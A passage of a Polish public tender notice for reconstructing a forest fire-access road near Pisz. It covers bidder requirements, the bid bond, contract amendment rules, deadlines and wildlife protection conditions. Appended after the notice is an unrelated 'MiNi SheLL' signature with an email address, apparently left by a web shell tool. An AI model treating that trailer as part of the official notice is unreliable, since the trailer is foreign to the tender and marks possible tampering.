powyżej, wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie<br/>opisanego przez zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej;<br/>b) wykaz robót budowlanych (zgodnie z załącznikiem nr 5 do SWZ) wykonanych nie wcześniej niż w okresie ostatnich 5 lat (od dnia,<br/>w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich<br/>rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z<br/>przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów – inne odpowiednie dokumenty, z których wynikać będzie<br/>należyte wykonanie przez Wykonawcę w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, co najmniej dwoma odrębnymi robotami budowlanymi polegającymi na budowie lub<br/>przebudowie drogi o nawierzchni bitumicznej o wartości robót co najmniej 3 500 000,00 złotych brutto. Jeżeli wykonawca powołuje<br/>się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz o którym mowa<br/>powyżej, dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył;<br/>b) wykaz osób (zgodnie z załącznikiem nr 6 do SWZ), skierowanych przez wykonawcę do realizacji zamówienia, w szczególności<br/>odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami, z którego wynikać będzie dysponowanie Kierownikiem<br/>budowy posiadającym uprawnienia budowlane w specjalności drogowej uprawniające do kierowania robotami budowlanymi</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do przetargu Wykonawca jest zobowiązany wnieść wadium w kwocie –50.000,00 zł (słownie złotych:<br/>pięćdziesiąt tysięcy).<br/>2. Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9. listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2025 r. poz. 98, z późn. zm.).<br/>3. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust.1 pkt 2 i 3 oraz ust. 2 ustawy.<br/>4. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium<br/>albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy w PKO BP nr 11 1020 3541 0000 5402<br/>0262 8972 (z dopiskiem na przelewie: „Wadium w postępowaniu nr SA.270.32.2025”. Wniesienie wadium w pieniądzu<br/>przelewem na rachunek bankowy wskazany przez zamawiającego będzie skuteczne z chwilą uznania tego rachunku<br/>bankowego kwotą wadium (jeżeli wpływ środków pieniężnych na rachunek bankowy wskazany przez zamawiającego<br/>nastąpi przed upływem terminu składania ofert).<br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 2 pkt 2-4, wykonawca przekazuje<br/>zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>7. Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub<br/>poręczenia, o których mowa w ust. 2 pkt 2-4, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty<br/>wadium, jeżeli:<br/>1) wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 128 ust. 1 ustawy, z przyczyn leżących po jego stronie, nie<br/>złożył podmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 ustawy, oświadczenia,<br/>o którym mowa w art. 125 ust. 1 ustawy, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o<br/>której mowa w art. 223 ust. 2 pkt 3 ustawy, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę<br/>jako najkorzystniejszej;<br/>2) wykonawca, którego oferta została wybrana:<br/>a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,<br/>b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;<br/>3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy,<br/>którego oferta została wybrana.<br/>10. W przypadku wniesienia wadium w pieniądzu wykonawca może wyrazić zgodę na zaliczenie kwoty wadium na poczet<br/>zabezpieczenia.<br/>11. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98<br/>ust. 2 pkt 3 ustawy – zostanie odrzucona.<br/>12. Zasady zwrotu wadium określone zostały w art. 98 ust. 1-5 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>Oferty złożone wspólnie przez dwóch lub więcej Wykonawców będą musiały spełnić następujące wymagania:<br/>1) oferta będzie podpisana w taki sposób, aby wiązała prawnie wszystkich Wykonawców składających wspólnie ofertę;<br/>2) wszyscy Wykonawcy składający wspólnie ofertę będą ponosić odpowiedzialność solidarną za wykonanie umowy zgodnie<br/>z jej postanowieniami;<br/>3) jeden z Wykonawców składających wspólnie ofertę zostanie ustanowiony jako pełnomocnik, upoważniony do<br/>reprezentowania wszystkich Wykonawców składających wspólnie ofertę w postępowaniu albo do reprezentowania<br/>wszystkich Wykonawców wspólnie składających ofertę w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego – do oferty należy dołączyć pełnomocnictwo sporządzone w formie elektronicznej (tj. w postaci elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym, w formie pisemnej lub w formie dokumentowej, w zakresie i w sposób określony w przepisach<br/>wydanych na podstawie art. 70 ustawy);<br/>4) dokumenty i oświadczenia Wykonawców składających wspólnie ofertę winny być złożone zgodnie z cz. XXII ust. 2 SWZ.<br/>5) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera),<br/>upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla<br/>wszystkich partnerów;<br/>6) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>7) Zamawiający informuje o treści przepisu art. 117 ust. 3 ustawy, zgodnie z którym w odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane. W związku z powyższym zgodnie z art. 117 ust. 4 ustawy Wykonawca jest zobowiązany załączyć do oferty<br/>podmiotowy środek dowodowy w postaci oświadczenia, z którego wynika, które roboty budowlane wykonają poszczególni<br/>Wykonawcy. Wzór stosownego oświadczenia został zawarty w Formularzu Oferty stanowiącym Załącznik nr 1 do SWZ i<br/>Zamawiający zaleca złożyć to oświadczenie właśnie w tym Formularzu. Obowiązek złożenia oświadczenia, o którym mowa<br/>w art. 117 ust. 4 ustawy odnosi się również do Wykonawców, prowadzących działalność w formie spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany osób przewidzianych do realizacji zamówienia przez Wykonawcę w<br/>przypadkach nieprzewidzianych zdarzeń losowych m.in. takich jak: śmierć, choroba, ustanie stosunku pracy, zmiana<br/>zakresu obowiązków, nienależyte wykonywanie obowiązków lub inne pod warunkiem, że osoby zaproponowane przez<br/>Wykonawcę będą posiadały wymagane prawem kwalifikacje<br/>Na podstawie art. 455 ustawy PZP każda ze stron może żądać wprowadzenia zmian w umowie w stosunku do treści oferty,<br/>na podstawie której dokonano wyboru Wykonawcy, pod następującymi warunkami:<br/>1. Zamawiający przewiduje zmiany umowy w niżej opisanych przypadkach:<br/>1) Zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy, w przypadku:<br/>a) wprowadzenia zmian w dokumentacji projektowej co może powodować brak możliwości dotrzymania pierwotnego<br/>terminu zakończenia realizacji zawartej umowy;<br/>b) przerw w realizacji robót budowlanych powstałych z przyczyn nie leżących po stronie Wykonawcy;<br/>c) powierzenia przez Zamawiającego wykonania robót dodatkowych lub zamiennych, jeżeli terminy ich powierzenia, rodzaj<br/>lub zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy;<br/>d) pisemnego uzgodnienia pomiędzy Stronami dotyczącego skróceniu terminu zakończenia realizacji umowy;<br/>e) konieczności uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji: danych, zgód lub pozwoleń osób<br/>trzecich lub właściwych organów;<br/>f) wstrzymania realizacji prac objętych umową, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;<br/>- działanie siły wyższej, tj. wyjątkowego zdarzenia lub okoliczności;<br/>- konieczność wykonania dodatkowych badań, ekspertyz, analiz itp.<br/>Nie uważa się za czynnik zakłócający wpływ czynników atmosferycznych w czasie realizacji robót, który przy składaniu ofert<br/>musi być normalnie brany pod uwagę (wyjątek stanowią przeszkody atmosferyczne o charakterze katastrof).<br/>h) zmiany spowodowane warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności:<br/>- niewypały i niewybuchy,<br/>- wykopaliska archeologiczne nieprzewidywane w SWZ,<br/>- odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntu, kurzawka, itp., skutkujące<br/>niemożliwością zrealizowania przedmiotu zamówienia przy dotychczasowych założeniach technologicznych, odmienne od<br/>przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub<br/>obiektów infrastrukturalnych.<br/>i) zmiany zakresu robót wynikających z wprowadzenia zmian istotnych lub nieistotnych w rozumieniu Prawa budowlanego w<br/>dokumentacji projektowej, które wynikły w trakcie realizacji robót i były konieczne w celu prawidłowej realizacji przedmiotu<br/>zamówienia,<br/>j) konieczności wykonania robót wynikających z rozwiązań zamiennych niewykraczających poza zakres przedmiotu<br/>zamówienia, a koniecznych dla wykonania całości robót i uzyskania założonego efektu użytkowego,<br/>k) zmiany przepisów, które skutkują zmianą pozwolenia na budowę lub zgłoszenia wydanego dla realizowanego<br/>zamówienia,<br/>l) konieczności wykonania prac wynikających z zaleceń organów uprawnionych np. nadzoru budowlanego itp.,<br/>m) nadzwyczajnych zdarzeń gospodarczych lub okoliczności, których Zamawiający nie mógł przewidzieć w chwili zawarcia<br/>umowy.<br/>2) Zmiany technologiczne, w szczególności:<br/>a) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w<br/>dokumentacji projektowej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym<br/>wykonaniem projektu,<br/>b) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na<br/>zmiany obowiązującego prawa. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/lasy_pisz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Należy zastosować się do wytycznych zawartych w decyzji o środowiskowych uwarunkowaniach POŚ.6220.01.2024.10 z<br/>dnia 26.04.2024 r., w szczególności:<br/>- ograniczenia terminu prowadzenia prac poza okresem lęgowym bielika tj. poza okresem od stycznia do końca sierpnia, na<br/>odcinku drogi od granicy działek nr 1189 i 1172 obręb Snopki do miejscowości Niedźwiedzi Róg;<br/>- prace ziemne realizowane w obrębie rowów przydrożnych należy przeprowadzać w taki sposób, aby nie zagrażało to<br/>przedostaniu się do nich drobnych zwierząt; podczas prac ziemnych należy również kontrolować światła wykopów pod<br/>kątem obecności zwierząt. Do działań zabezpieczających należy również odławianie uwięzionych w świetle wykopu<br/>zwierząt i przenoszenie ich do miejsc bezpiecznego bytowania. W miejscach występowania płazów oraz siedlisk innych<br/>zwierząt prace należy wykonywać ręcznie,<br/>- w okresach sezonowej aktywności płazów tj. od początku marca do połowy maja oraz od połowy września do końca<br/>października, na odcinku drogi przebiegającym w otoczeniu cieków wodnych oraz innych zidentyfikowanych siedlisk<br/>hydrogenicznych np. Okresowych zbiorników wodnych, należy przeprowadzić kontrole terenowe w zakresie występowania<br/>płazów. W przypadku stwierdzenia obecności płazów na terenie inwestycji, w miejscach wskazanych przez specjalistę<br/>herpetologa należy usytuować tymczasowe wygrodzenie placu budowy za pomocą płotka (z plastiku, geotkaniny,<br/>geowłókniny lub siatki drucianej o oczkach nie większych niż 5 mm). W trakcie wykonywania tych czynności specjalista<br/>herpetolog powinien zweryfikować poprawność lokalizacji ogrodzeń w oparciu o bieżące obserwacje w terenie dotyczące<br/>aktywności poszczególnych gatunków w otoczeniu inwestycji i na tej podstawie może dokonać korekty lokalizacji<br/>wygrodzeń. Wykonywanie tych czynności zabronionych w stosunku do gatunków objętych ochroną, jak np. przeniesienie<br/>płazów do siedlisk zastępczych, możliwe będzie po wcześniejszym uzyskaniu zezwolenia na odstępstwa od zakazów<br/>obowiązujących w stosunku do gatunków objętych ochroną.<br/>Zamawiający informuje, że w dniu 23.07.2025 r. udzielił zamówienia na realizację zadania Przebudowa drogi leśnej dojazdu pożarowego nr 5 - etap I obejmujący odcinek drogi leśnej od km 0+000 do km 4+690. Termin realizacji udzielonego zamówienia do dnia 20.10.2025 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com